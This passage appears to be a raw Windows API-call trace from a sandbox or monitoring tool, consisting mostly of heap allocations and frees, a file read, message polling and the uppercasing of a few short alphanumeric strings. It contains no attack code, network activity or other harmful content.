[0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0189.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0189.799] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0189.799] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x3c59, lpOverlapped=0x0) returned 1 [0189.800] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0189.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3c59) returned 0x34a2048 [0189.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0189.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3c59) returned 0x34a5cb0 [0189.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3c59) returned 0x34a2048 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0189.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0189.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0189.802] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0189.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3c59) returned 0x34a2048 [0189.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0189.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0189.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0189.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3c59) returned 0x24d7a58 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0189.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0189.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0189.805] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0189.805] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0189.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0189.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.807] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.808] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0189.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.808] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0189.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.809] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.809] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.809] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0189.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.810] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.810] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.810] PeekMessageW 